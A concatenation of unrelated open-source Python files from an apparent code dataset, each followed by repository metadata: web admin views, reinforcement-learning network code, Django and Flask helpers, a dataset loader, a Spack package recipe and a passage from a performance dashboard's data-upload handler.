"OperationsEvent__count": items_count,
"OperationsEvents": items_paged,
"pager": pager,
"enable_redis": self.request.registry.settings["app_settings"][
"enable_redis"
],
"enable_nginx": self.request.registry.settings["app_settings"][
"enable_nginx"
],
"event_type": event_type,
}
@view_config(
route_name="admin:operations:log:focus",
renderer="/admin/operations-log-focus.mako",
)
def operations_log_focus(self):
item = lib_db.get.get__OperationsEvent__by_id(
self.request.api_context, self.request.matchdict["id"], eagerload_log=True
)
if not item:
raise ValueError("no item")
return {
"project": "peter_sslers",
"OperationsEvent": item,
"enable_redis": self.request.registry.settings["app_settings"][
"enable_redis"
],
"enable_nginx": self.request.registry.settings["app_settings"][
"enable_nginx"
],
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:operations:redis", renderer="/admin/operations-redis.mako"
)
@view_config(
route_name="admin:operations:redis_paginated",
renderer="/admin/operations-redis.mako",
)
def admin_redis(self):
try:
# could raise `lib.errors.InvalidRequest`
# is this needed for viewing logs though?
# self._ensure_redis()
_items_per_page = 25
items_count = lib_db.get.get__OperationsEvent__count(
self.request.api_context,
event_type_ids=(
model_utils.OperationsEventType.from_string(
"operations__redis_prime"
),
),
)
url_template = (
"%s/operations/redis/log/{0}"
% self.request.registry.settings["app_settings"]["admin_prefix"]
)
(pager, offset) = self._paginate(
items_count,
url_template=url_template,
items_per_page=_items_per_page,
)
items_paged = lib_db.get.get__OperationsEvent__paginated(
self.request.api_context,
event_type_ids=(
model_utils.OperationsEventType.from_string(
"operations__redis_prime"
),
),
limit=_items_per_page,
offset=offset,
)
return {
"project": "peter_sslers",
"OperationsEvent__count": items_count,
"OperationsEvents": items_paged,
"pager": pager,
"enable_redis": self.request.registry.settings["app_settings"][
"enable_redis"
],
}
except errors.InvalidRequest as exc:
if self.request.wants_json:
return {
"result": "error",
"error": exc.args[0],
}
raise HTTPFound(
"%s?result=error&error=%s"
% (
self.request.registry.settings["app_settings"]["admin_prefix"],
exc.as_querystring,
)
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:operations:nginx", renderer="/admin/operations-nginx.mako"
)
@view_config(
route_name="admin:operations:nginx_paginated",
renderer="/admin/operations-nginx.mako",
)
def admin_nginx(self):
try:
# could raise `lib.errors.InvalidRequest`
# is this needed for viewing logs though?
# self._ensure_nginx()
_items_per_page = 25
_event_type_ids = (
model_utils.OperationsEventType.from_string(
"operations__nginx_cache_expire"
),
model_utils.OperationsEventType.from_string(
"operations__nginx_cache_flush"
),
)
items_count = lib_db.get.get__OperationsEvent__count(
self.request.api_context, event_type_ids=_event_type_ids
)
url_template = (
"%s/operations/nginx/log/{0}"
% self.request.registry.settings["app_settings"]["admin_prefix"]
)
(pager, offset) = self._paginate(
items_count,
url_template=url_template,
items_per_page=_items_per_page,
)
items_paged = lib_db.get.get__OperationsEvent__paginated(
self.request.api_context,
event_type_ids=_event_type_ids,
limit=_items_per_page,
offset=offset,
)
return {
"project": "peter_sslers",
"OperationsEvent__count": items_count,
"OperationsEvents": items_paged,
"pager": pager,
"enable_nginx": self.request.registry.settings["app_settings"][
"enable_nginx"
],
}
except errors.InvalidRequest as exc:
if self.request.wants_json:
return {
"result": "error",
"error": exc.args[0],
}
raise HTTPFound(
"%s/?result=error&&error=%s"
% (
self.request.registry.settings["app_settings"]["admin_prefix"],
exc.as_querystring,
)
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:operations:object_log",
renderer="/admin/operations-object_log.mako",
)
@view_config(
route_name="admin:operations:object_log_paginated",
renderer="/admin/operations-object_log.mako",
)
def object_log(self):
_items_per_page = 25
items_count = lib_db.get.get__OperationsObjectEvent__count(
self.request.api_context
)
url_template = (
"%s/operations/object-log/{0}"
% self.request.registry.settings["app_settings"]["admin_prefix"]
)
(pager, offset) = self._paginate(
items_count,
url_template=url_template,
items_per_page=_items_per_page,
)
items_paged = lib_db.get.get__OperationsObjectEvent__paginated(
self.request.api_context, limit=_items_per_page, offset=offset
)
return {
"project": "peter_sslers",
"OperationsObjectEvent__count": items_count,
"OperationsObjectEvents": items_paged,
"pager": pager,
"enable_redis": self.request.registry.settings["app_settings"][
"enable_redis"
],
"enable_nginx": self.request.registry.settings["app_settings"][
"enable_nginx"
],
}
@view_config(
route_name="admin:operations:object_log:focus",
renderer="/admin/operations-object_log-focus.mako",
)
def operations_object_log_focus(self):
item = lib_db.get.get__OperationsObjectEvent__by_id(
self.request.api_context, self.request.matchdict["id"], eagerload_log=True
)
if not item:
raise ValueError("no item")
return {
"project": "peter_sslers",
"OperationsObjectEvent": item,
"enable_redis": self.request.registry.settings["app_settings"][
"enable_redis"
],
"enable_nginx": self.request.registry.settings["app_settings"][
"enable_nginx"
],
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| 36.484277 | 93 | 0.508102 | [
"MIT"
] | jvanasco/peter_sslers | src/peter_sslers/web/views_admin/operation.py | 11,602 | Python |
#######################################################################
# Copyright (C) 2017 Shangtong Zhang([email protected]) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
from .network_utils import *
from .network_bodies import *
from .hyper_bodies import *
from .hypernetwork_ops import *
from ..utils.hypernet_heads_defs import *
from ..component.samplers import *
class VanillaHyperNet(nn.Module, BaseNet):
def __init__(self, output_dim, body):
super(VanillaHyperNet, self).__init__()
self.mixer = False
self.config = VanillaNet_config(body.feature_dim, output_dim)
self.fc_head = LinearGenerator(self.config['fc_head'])
self.body = body
self.to(Config.DEVICE)
def sample_model_seed(self):
if not self.mixer:
self.model_seed = {
'fc_head_z': torch.rand(self.fc_head.config['n_gen'], particles, self.z_dim).to(Config.DEVICE)
}
else:
self.model_seed = torch.rand(particles, self.s_dim)
def forward(self, x, z=None):
phi = self.body(tensor(x, z))
y = self.fc_head(z[0], phi)
return y
class DuelingHyperNet(nn.Module, BaseNet):
def __init__(self, action_dim, body, hidden, dist, particles):
super(DuelingHyperNet, self).__init__()
self.mixer = False
self.config = DuelingNet_config(body.feature_dim, action_dim)
self.config['fc_value'] = self.config['fc_value']._replace(d_hidden=hidden)
self.config['fc_advantage'] = self.config['fc_advantage']._replace(d_hidden=hidden)
self.fc_value = LinearGenerator(self.config['fc_value']).cuda()
self.fc_advantage = LinearGenerator(self.config['fc_advantage']).cuda()
self.features = body
self.s_dim = self.config['s_dim']
self.z_dim = self.config['z_dim']
self.n_gen = self.config['n_gen']
self.particles = particles
self.noise_sampler = NoiseSampler(dist, self.z_dim, self.particles)
# self.sample_model_seed()
self.to(Config.DEVICE)
def sample_model_seed(self):
sample_z = self.noise_sampler.sample().to(Config.DEVICE)
# sample_z = sample_z.unsqueeze(0).repeat(self.features.config['n_gen'], 1, 1)
sample_z = sample_z.unsqueeze(0).repeat(self.particles, 1)
self.model_seed = {
'value_z': sample_z,
'advantage_z': sample_z,
}
def set_model_seed(self, seed):
self.model_seed = seed
def forward(self, x, to_numpy=False, theta=None):
if not isinstance(x, torch.cuda.FloatTensor):
x = tensor(x)
if x.shape[0] == 1 and x.shape[1] == 1: ## dm_env returns one too many dimensions
x = x[0]
phi = self.body(x)
return self.head(phi)
def body(self, x=None):
if not isinstance(x, torch.cuda.FloatTensor):
x = tensor(x)
return self.features(x)
def head(self, phi):
phi = phi.repeat(self.particles, 1, 1) # since we have a deterministic body with many heads
value = self.fc_value(self.model_seed['value_z'], phi)
advantage = self.fc_advantage(self.model_seed['advantage_z'], phi)
q = value.expand_as(advantage) + (advantage - advantage.mean(-1, keepdim=True).expand_as(advantage))
return q
def sample_model(self, component):
param_sets = []
if component == 'q':
param_sets.extend(self.fc_value(z=self.model_seed['value_z']))
param_sets.extend(self.fc_advantage(z=self.model_seed['advantage_z']))
return param_sets
def predict_action(self, x, pred, to_numpy=False):
x = tensor(x)
q = self(x)
if pred == 'max':
max_q, max_q_idx = q.max(-1) # max over q values
max_actor = max_q.max(0)[1] # max over particles
action = q[max_actor].argmax()
elif pred == 'rand':
idx = np.random.choice(self.particles, 1)[0]
action = q[idx].max(0)[1]
elif pred == 'mean':
action_means = q.mean(0) #[actions]
action = action_means.argmax()
if to_numpy:
action = action.cpu().detach().numpy()
return action
| 38.230769 | 114 | 0.586184 | [
"MIT"
] | neale/HyperDeepRL | deep_rl/network/hyper_heads.py | 4,473 | Python |
from django.utils import timezone
from .forms import SchedDayForm
class AdminCommonMixin(object):
"""
    Common methods shared by all admin classes:
    set default values for owner, creation date, etc.
"""
def save_model(self, request, obj, form, change):
try:
obj.created_by = request.user
except:
pass
super().save_model(request, obj, form, change)
def get_queryset(self, request):
"""
        Return the full queryset for superusers,
        otherwise only the objects created by the requesting user.
"""
qs = super().get_queryset(request)
if request.user.is_superuser:
return qs
return qs.filter(created_by=request.user)
def response_change(self, request, obj):
"""
        Handle a custom action submitted from the change form,
        e.g. '_custom_action' in request.POST.
"""
if '_custom_action' in request.POST:
pass
return super().response_change(request, obj)
def response_add(self, request, obj):
"""
        Handle a custom action submitted from the add form,
        e.g. '_custom_action' in request.POST.
"""
if '_custom_action' in request.POST:
pass
return super().response_add(request, obj)
class CalendarActionMixin(object):
def save_model(self, request, obj, form, change):
try:
obj.created_by = request.user
except:
pass
super().save_model(request, obj, form, change)
def get_queryset(self, request):
"""
        Return the full queryset for superusers,
        otherwise only the objects created by the requesting user.
"""
qs = super().get_queryset(request)
if request.user.is_superuser:
return qs
return qs.filter(created_by=request.user)
def changelist_view(self, request, extra_context=None):
response = super().changelist_view(
request,
extra_context=extra_context
)
try:
            # only keep the days that have times of day set
qs = response.context_data['cl'].queryset.timesofdays()
except (AttributeError, KeyError):
return response
response.context_data['scheduled_days'] = qs
return response
| 28.367089 | 67 | 0.594378 | [
"MIT"
] | dvek/scyp | schedules/mixins.py | 2,241 | Python |
# coding=utf-8
# Copyright 2020 The HuggingFace NLP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""DailyDialog: A Manually Labelled Multi-turn Dialogue Dataset"""
from __future__ import absolute_import, division, print_function
import os
from zipfile import ZipFile
import nlp
_CITATION = """\
@InProceedings{li2017dailydialog,
author = {Li, Yanran and Su, Hui and Shen, Xiaoyu and Li, Wenjie and Cao, Ziqiang and Niu, Shuzi},
title = {DailyDialog: A Manually Labelled Multi-turn Dialogue Dataset},
booktitle = {Proceedings of The 8th International Joint Conference on Natural Language Processing (IJCNLP 2017)},
year = {2017}
}
"""
_DESCRIPTION = """\
We develop a high-quality multi-turn dialog dataset, DailyDialog, which is intriguing in several aspects.
The language is human-written and less noisy. The dialogues in the dataset reflect our daily communication way
and cover various topics about our daily life. We also manually label the developed dataset with communication
intention and emotion information. Then, we evaluate existing approaches on DailyDialog dataset and hope it
benefit the research field of dialog systems.
"""
_URL = "http://yanran.li/files/ijcnlp_dailydialog.zip"
act_label = {
"0": "__dummy__", # Added to be compatible out-of-the-box with nlp.ClassLabel
"1": "inform",
"2": "question",
"3": "directive",
"4": "commissive",
}
emotion_label = {
"0": "no emotion",
"1": "anger",
"2": "disgust",
"3": "fear",
"4": "happiness",
"5": "sadness",
"6": "surprise",
}
class DailyDialog(nlp.GeneratorBasedBuilder):
"""DailyDialog: A Manually Labelled Multi-turn Dialogue Dataset"""
VERSION = nlp.Version("1.0.0")
__EOU__ = "__eou__"
def _info(self):
return nlp.DatasetInfo(
description=_DESCRIPTION,
features=nlp.Features(
{
"dialog": nlp.features.Sequence(
nlp.Value("string")
),
"act": nlp.features.Sequence(
nlp.ClassLabel(names=list(act_label.values()))
),
"emotion": nlp.features.Sequence(
nlp.ClassLabel(names=list(emotion_label.values()))
),
}
),
supervised_keys=None,
homepage="http://yanran.li/dailydialog",
citation=_CITATION,
)
def _split_generators(self, dl_manager: nlp.DownloadManager):
"""Returns SplitGenerators."""
# dl_manager is a nlp.download.DownloadManager that can be used to
# download and extract URLs
dl_dir = dl_manager.download_and_extract(_URL)
data_dir = os.path.join(dl_dir, "ijcnlp_dailydialog")
# The splits are nested inside the zip
for name in ("train", "validation", "test"):
zip_fpath = os.path.join(data_dir, f"{name}.zip")
with ZipFile(zip_fpath) as zip_file:
zip_file.extractall(path=data_dir)
zip_file.close()
return [
nlp.SplitGenerator(
name=nlp.Split.TRAIN,
# These kwargs will be passed to _generate_examples
gen_kwargs={
"file_path": os.path.join(data_dir, "train", "dialogues_train.txt"),
"act_path": os.path.join(data_dir, "train", "dialogues_act_train.txt"),
"emotion_path": os.path.join(data_dir, "train", "dialogues_emotion_train.txt"),
"split": "train",
},
),
nlp.SplitGenerator(
name=nlp.Split.TEST,
# These kwargs will be passed to _generate_examples
gen_kwargs={
"file_path": os.path.join(data_dir, "test", "dialogues_test.txt"),
"act_path": os.path.join(data_dir, "test", "dialogues_act_test.txt"),
"emotion_path": os.path.join(data_dir, "test", "dialogues_emotion_test.txt"),
"split": "test",
},
),
nlp.SplitGenerator(
name=nlp.Split.VALIDATION,
# These kwargs will be passed to _generate_examples
gen_kwargs={
"file_path": os.path.join(data_dir, "validation", "dialogues_validation.txt"),
"act_path": os.path.join(data_dir, "validation", "dialogues_act_validation.txt"),
"emotion_path": os.path.join(data_dir, "validation", "dialogues_emotion_validation.txt"),
"split": "dev",
},
),
]
def _generate_examples(self, file_path, act_path, emotion_path, split):
""" Yields examples. """
# Yields (key, example) tuples from the dataset
with open(file_path, "r", encoding="utf-8") as f, open(act_path, "r", encoding="utf-8") as act, open(
emotion_path, "r", encoding="utf-8"
) as emotion:
for i, (line_f, line_act, line_emotion) in enumerate(zip(f, act, emotion)):
if len(line_f.strip()) == 0:
break
dialog = line_f.split(self.__EOU__)[:-1]
act = line_act.split(" ")[:-1]
emotion = line_emotion.split(" ")[:-1]
assert len(dialog) == len(act) == len(emotion), "Different turns btw dialogue & emotion & action"
yield f"{split}-{i}", {
"dialog": dialog,
"act": [act_label[x] for x in act],
"emotion": [emotion_label[x] for x in emotion],
}
| 39.392405 | 117 | 0.587725 | [
"Apache-2.0"
] | vinayya/nlp | datasets/daily_dialog/daily_dialog.py | 6,224 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright © 2007 Free Software Foundation, Inc. <https://fsf.org/>
#
# Licensed under the GNU General Public License, version 3 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://jxself.org/translations/gpl-3.zh.shtml
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import json
from functools import wraps
from flask_restful import ResponseBase
from sfo_server.models import SfoServerUser, SfoAccountManagerMethod, SfoServerAccessLog
from sfo_server.resource.common import timestamp_format
from flask import request, g, session
def access_log_decorate(func):
"""
    Decorator that records a user's URL access activity after login.
:param func:
:return:
"""
@wraps(func)
def wrapper(*args, **kwargs):
        access_user = request.headers.get('X-Real-IP', request.remote_addr)
access_method = request.method
access_path = request.path
access_time = timestamp_format(time.time())
resp = func(*args, **kwargs)
access_result = resp[0].get('status')
access_message = resp[0].get('message', 'Internal Server Error') if resp else 'Internal Server Error'
SfoServerAccessLog.add_access_log(access_user, access_method, access_path, access_time, access_result, access_message)
return resp
return wrapper
def login_required(func):
"""
    Verify that the user is logged in.
:param func:
:return:
"""
@wraps(func)
def wrapper(*args, **kwargs):
user_account = session.get('username', '')
if user_account:
login_user = SfoServerUser.query_user_by_account(user_account)
g.user = login_user
return func(*args, **kwargs)
else:
return ResponseBase(json.dumps({'status': 401, "message": u'请先登录'}),
status=401, content_type='application/json')
return wrapper
def permission_required(*resources):
"""
    Permission verification; assumes the user is already logged in.
    :param resources: the resource objects whose access is controlled
"""
def decorate(func):
@wraps(func)
def wrapper(*args, **kwargs):
method = func.__name__
resource_names = [resource.__tablename__ for resource in resources]
need_permission = set([method + '_' + resource_name for resource_name in resource_names])
user = getattr(g, 'user', '')
has_permission_set = set()
is_clusteradmin = user.is_clusteradmin if user else 0
if is_clusteradmin:
return func(*args, **kwargs)
if user:
for role in user.roles:
for permission in role.permissions:
has_permission_set.add(permission.permission_name)
if not need_permission.issubset(has_permission_set):
return ResponseBase(json.dumps({'status': 403, 'message': u'权限不足,请联系管理员'}),
status=403, content_type='application/json')
else:
return func(*args, **kwargs)
else:
return ResponseBase(json.dumps({'status': 401, "message": u'请先登录'}),
status=401, content_type='application/json')
return wrapper
return decorate
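# Illustrative usage (the handler method is hypothetical; SfoServerUser is the
# resource whose permissions are checked, and login_required must be the
# outermost decorator so that g.user is set first):
#     @login_required
#     @permission_required(SfoServerUser)
#     def get(self):
#         ...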
| 36.222222 | 126 | 0.634969 | [
"Apache-2.0"
] | SF-Technology/SFO | sfo_server/decorate.py | 3,725 | Python |
import itertools
m,n = input().split()
n = int(n)
l = [ ''.join(list(i)) for i in list(itertools.permutations(list(m), n))]
l.sort()
for i in l:
    print(i)
| 22.428571 | 73 | 0.617834 | [
"MIT"
] | abhinavgunwant/hackerrank-solutions | Domains/Python/06 - Itertools/itertools.permutations()/solution.py | 157 | Python |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import os
class PyPybind11(CMakePackage):
"""pybind11 -- Seamless operability between C++11 and Python.
pybind11 is a lightweight header-only library that exposes C++ types in
Python and vice versa, mainly to create Python bindings of existing C++
code. Its goals and syntax are similar to the excellent Boost.Python
library by David Abrahams: to minimize boilerplate code in traditional
extension modules by inferring type information using compile-time
introspection."""
homepage = "https://pybind11.readthedocs.io"
url = "https://github.com/pybind/pybind11/archive/v2.6.2.tar.gz"
git = "https://github.com/pybind/pybind11.git"
maintainers = ['ax3l']
version('master', branch='master')
version('2.6.2', sha256='8ff2fff22df038f5cd02cea8af56622bc67f5b64534f1b83b9f133b8366acff2')
version('2.6.1', sha256='cdbe326d357f18b83d10322ba202d69f11b2f49e2d87ade0dc2be0c5c34f8e2a')
version('2.5.0', sha256='97504db65640570f32d3fdf701c25a340c8643037c3b69aec469c10c93dc8504', preferred=True)
version('2.4.3', sha256='1eed57bc6863190e35637290f97a20c81cfe4d9090ac0a24f3bbf08f265eb71d')
version('2.3.0', sha256='0f34838f2c8024a6765168227ba587b3687729ebf03dc912f88ff75c7aa9cfe8')
version('2.2.4', sha256='b69e83658513215b8d1443544d0549b7d231b9f201f6fc787a2b2218b408181e')
version('2.2.3', sha256='3a3b7b651afab1c5ba557f4c37d785a522b8030dfc765da26adc2ecd1de940ea')
version('2.2.2', sha256='b639a2b2cbf1c467849660801c4665ffc1a4d0a9e153ae1996ed6f21c492064e')
version('2.2.1', sha256='f8bd1509578b2a1e7407d52e6ee8afe64268909a1bbda620ca407318598927e7')
version('2.2.0', sha256='1b0fda17c650c493f5862902e90f426df6751da8c0b58c05983ab009951ed769')
version('2.1.1', sha256='f2c6874f1ea5b4ad4ffffe352413f7d2cd1a49f9050940805c2a082348621540')
version('2.1.0', sha256='2860f2b8d0c9f65f0698289a161385f59d099b7ead1bf64e8993c486f2b93ee0')
depends_on('py-setuptools', type='build')
extends('python')
# compiler support
conflicts('%gcc@:4.7')
conflicts('%clang@:3.2')
conflicts('%intel@:16')
def cmake_args(self):
args = []
args.append('-DPYTHON_EXECUTABLE:FILEPATH=%s'
% self.spec['python'].command.path)
args += [
self.define('PYBIND11_TEST', self.run_tests)
]
return args
def setup_build_environment(self, env):
env.set('PYBIND11_USE_CMAKE', 1)
# https://github.com/pybind/pybind11/pull/1995
@when('@:2.4.99')
def patch(self):
""" see https://github.com/spack/spack/issues/13559 """
filter_file('import sys',
'import sys; return "{0}"'.format(self.prefix.include),
'pybind11/__init__.py',
string=True)
def install(self, spec, prefix):
super(PyPybind11, self).install(spec, prefix)
setup_py('install', '--single-version-externally-managed', '--root=/',
'--prefix={0}'.format(prefix))
@run_after('install')
@on_package_attributes(run_tests=True)
def install_test(self):
with working_dir('spack-test', create=True):
# test include helper points to right location
python = self.spec['python'].command
py_inc = python(
'-c',
'import pybind11 as py; ' +
self.spec['python'].package.print_string('py.get_include()'),
output=str).strip()
for inc in [py_inc, self.prefix.include]:
inc_file = join_path(inc, 'pybind11', 'pybind11.h')
assert os.path.isfile(inc_file)
| 43.426966 | 111 | 0.682536 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | ikitayama/spack | var/spack/repos/builtin/packages/py-pybind11/package.py | 3,865 | Python |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""URL endpoint to allow Buildbot slaves to post data to the dashboard."""
import copy
import json
import logging
import math
import re
from google.appengine.api import datastore_errors
from google.appengine.api import taskqueue
from google.appengine.ext import ndb
from dashboard import math_utils
from dashboard import post_data_handler
from dashboard.common import datastore_hooks
from dashboard.models import graph_data
_TASK_QUEUE_NAME = 'new-points-queue'
# Number of rows to process per task queue task. This limits the task size
# and execution time (Limits: 100KB object size and 10 minutes execution time).
_TASK_QUEUE_SIZE = 32
# Max length for a Row property name.
_MAX_COLUMN_NAME_LENGTH = 25
# Maximum length of a value for a string property.
_STRING_COLUMN_MAX_LENGTH = 400
# Maximum number of properties for a Row.
_MAX_NUM_COLUMNS = 30
# Maximum length for a test path. This limit is required because the test path
# used as the string ID for TestContainer (the parent in the datastore for Row
# entities), and datastore imposes a maximum string ID length.
_MAX_TEST_PATH_LENGTH = 500
class BadRequestError(Exception):
"""An error indicating that a 400 response status should be returned."""
pass
class AddPointHandler(post_data_handler.PostDataHandler):
"""URL endpoint to post data to the dashboard."""
def post(self):
"""Validates data parameter and add task to queue to process points.
The row data comes from a "data" parameter, which is a JSON encoding of a
list of dictionaries, each of which represents one performance result
(one point in a graph) and associated data.
[
{
"master": "ChromiumPerf",
"bot": "xp-release-dual-core",
"test": "dromaeo/dom/modify",
"revision": 123456789,
"value": 24.66,
"error": 2.33,
"units": "ms",
"supplemental_columns": {
"d_median": 24234.12,
"d_mean": 23.553,
"r_webkit": 423340,
...
},
...
},
...
]
In general, the required fields are "master", "bot", "test" (which together
form the test path which identifies the series that this point belongs to),
and "revision" and "value", which are the X and Y values for the point.
This API also supports the Dashboard JSON v1.0 format (go/telemetry-json),
the first producer of which is Telemetry. Telemetry provides lightweight
serialization of values it produces, as JSON. If a dashboard JSON object is
passed, it will be a single dict rather than a list, with the test,
value, error, and units fields replaced by a chart_data field containing a
Chart JSON dict (see design doc, and example below). Dashboard JSON v1.0 is
processed by converting it into rows (which can be viewed as Dashboard JSON
v0).
{
"master": "ChromiumPerf",
<other row fields>,
"chart_data": {
"foo": {
"bar": {
"type": "scalar",
"name": "foo.bar",
"units": "ms",
"value": 4.2,
},
"summary": {
"type": "list_of_scalar_values",
"name": "foo",
"units": "ms",
"values": [4.2, 5.7, 6.8],
"std": 1.30512,
},
},
}
Request parameters:
data: JSON encoding of a list of dictionaries.
Outputs:
      Empty 200 response if successful,
200 response with warning message if optional data is invalid,
403 response with error message if sender IP is not white-listed,
400 response with error message if required data is invalid.
500 with error message otherwise.
"""
datastore_hooks.SetPrivilegedRequest()
if not self._CheckIpAgainstWhitelist():
# TODO(qyearsley): Add test coverage. See catapult:#1346.
return
data = self.request.get('data')
if not data:
# TODO(qyearsley): Add test coverage. See catapult:#1346.
self.ReportError('Missing "data" parameter.', status=400)
return
try:
data = json.loads(self.request.get('data'))
except ValueError:
self.ReportError('Invalid JSON string.', status=400)
return
logging.info('Received data: %s', data)
try:
if type(data) is dict:
if data.get('chart_data'):
data = _DashboardJsonToRawRows(data)
if not data:
return # No data to add, bail out.
else:
self.ReportError(
'Data should be a list of rows or a Dashboard JSON v1.0 dict.',
status=400)
return
test_map = _ConstructTestPathMap(data)
for row_dict in data:
_ValidateRowDict(row_dict, test_map)
_AddTasks(data)
except BadRequestError as error:
# If any of the data was invalid, abort immediately and return an error.
self.ReportError(error.message, status=400)
def _DashboardJsonToRawRows(dash_json_dict):
"""Formats a Dashboard JSON dict as a list of row dicts.
For the dashboard to begin accepting the Telemetry Dashboard JSON format
as per go/telemetry-json, this function chunks a Dashboard JSON literal
into rows and passes the resulting list to _AddTasks.
Args:
dash_json_dict: A dashboard JSON v1.0 dict.
Returns:
A list of dicts, each of which represents a point.
Raises:
AssertionError: The given argument wasn't a dict.
BadRequestError: The content of the input wasn't valid.
"""
assert type(dash_json_dict) is dict
# A Dashboard JSON dict should at least have all charts coming from the
# same master, bot and rev. It can contain multiple charts, however.
if not dash_json_dict.get('master'):
raise BadRequestError('No master name given.')
if not dash_json_dict.get('bot'):
raise BadRequestError('No bot name given.')
if not dash_json_dict.get('point_id'):
raise BadRequestError('No point_id number given.')
if not dash_json_dict.get('chart_data'):
raise BadRequestError('No chart data given.')
test_suite_name = _TestSuiteName(dash_json_dict)
chart_data = dash_json_dict.get('chart_data', {})
charts = chart_data.get('charts', {})
if not charts:
return [] # No charts implies no data to add.
# Links to about:tracing traces are listed under 'trace'; if they
# exist copy them to a separate dictionary and delete from the chartjson
# so that we don't try to process them as data points.
tracing_links = None
if 'trace' in charts:
tracing_links = charts['trace'].copy()
del charts['trace']
row_template = _MakeRowTemplate(dash_json_dict)
benchmark_description = chart_data.get('benchmark_description', '')
trace_rerun_options = dict(chart_data.get('trace_rerun_options', []))
is_ref = bool(dash_json_dict.get('is_ref'))
rows = []
for chart in charts:
for trace in charts[chart]:
# Need to do a deep copy here so we don't copy a_tracing_uri data.
row = copy.deepcopy(row_template)
specific_vals = _FlattenTrace(
test_suite_name, chart, trace, charts[chart][trace], is_ref,
tracing_links, benchmark_description)
# Telemetry may validly produce rows that represent a value of NaN. To
# avoid getting into messy situations with alerts, we do not add such
# rows to be processed.
if not (math.isnan(specific_vals['value']) or
math.isnan(specific_vals['error'])):
if specific_vals['tracing_uri']:
row['supplemental_columns']['a_tracing_uri'] = specific_vals[
'tracing_uri']
if trace_rerun_options:
row['supplemental_columns']['a_trace_rerun_options'] = (
trace_rerun_options)
row.update(specific_vals)
rows.append(row)
return rows
def _TestSuiteName(dash_json_dict):
"""Extracts a test suite name from Dashboard JSON.
The dashboard JSON may contain a field "test_suite_name". If this is not
present or it is None, the dashboard will fall back to using "benchmark_name"
in the "chart_data" dict.
"""
if dash_json_dict.get('test_suite_name'):
return dash_json_dict['test_suite_name']
try:
return dash_json_dict['chart_data']['benchmark_name']
except KeyError as e:
raise BadRequestError('Could not find test suite name. ' + e.message)
def _AddTasks(data):
"""Puts tasks on queue for adding data.
Args:
data: A list of dictionaries, each of which represents one point.
"""
task_list = []
for data_sublist in _Chunk(data, _TASK_QUEUE_SIZE):
task_list.append(taskqueue.Task(
url='/add_point_queue',
params={'data': json.dumps(data_sublist)}))
queue = taskqueue.Queue(_TASK_QUEUE_NAME)
for task_sublist in _Chunk(task_list, taskqueue.MAX_TASKS_PER_ADD):
# Calling get_result waits for all tasks to be added. It's possible that
# this is different, and maybe faster, than just calling queue.add.
queue.add_async(task_sublist).get_result()
def _Chunk(items, chunk_size):
"""Breaks a long list into sub-lists of a particular size."""
chunks = []
for i in range(0, len(items), chunk_size):
chunks.append(items[i:i + chunk_size])
return chunks
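# Example (illustrative): _Chunk([1, 2, 3, 4, 5], 2) -> [[1, 2], [3, 4], [5]].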
def _MakeRowTemplate(dash_json_dict):
"""Produces a template for rows created from a Dashboard JSON v1.0 dict.
_DashboardJsonToRawRows adds metadata fields to every row that it creates.
These include things like master, bot, point ID, versions, and other
supplementary data. This method produces a dict containing this metadata
to which row-specific information (like value and error) can be added.
Some metadata needs to be transformed to conform to the v0 format, and this
method is also responsible for that transformation.
Some validation is deferred until after the input is converted to a list
of row dicts, since revision format correctness is checked on a per-point
basis.
Args:
dash_json_dict: A dashboard JSON v1.0 dict.
Returns:
A dict containing data to include in each row dict that is created from
|dash_json_dict|.
"""
row_template = dash_json_dict.copy()
del row_template['chart_data']
del row_template['point_id']
row_template['revision'] = dash_json_dict['point_id']
annotations = row_template['supplemental']
versions = row_template['versions']
del row_template['supplemental']
del row_template['versions']
row_template['supplemental_columns'] = {}
supplemental = row_template['supplemental_columns']
for annotation in annotations:
supplemental['a_' + annotation] = annotations[annotation]
for version in versions:
supplemental['r_' + version] = versions[version]
return row_template
def _FlattenTrace(test_suite_name, chart_name, trace_name, trace,
is_ref=False, tracing_links=None, benchmark_description=''):
"""Takes a trace dict from dashboard JSON and readies it for display.
Traces can be either scalars or lists; if scalar we take the value directly;
if list we average the values and compute their standard deviation. We also
extract fields that are normally part of v0 row dicts that are uploaded
using add_point but are actually part of traces in the v1.0 format.
Args:
test_suite_name: The name of the test suite (benchmark).
chart_name: The name of the chart to which this trace belongs.
trace_name: The name of the passed trace.
trace: A trace dict extracted from a dashboard JSON chart.
is_ref: A boolean which indicates whether this trace comes from a
reference build.
tracing_links: A dictionary mapping trace names to about:tracing trace
urls in cloud storage
benchmark_description: A string documenting the benchmark suite to which
this trace belongs.
Returns:
A dict containing units, value, and error for this trace.
Raises:
BadRequestError: The data wasn't valid.
"""
if '@@' in chart_name:
tir_label, chart_name = chart_name.split('@@')
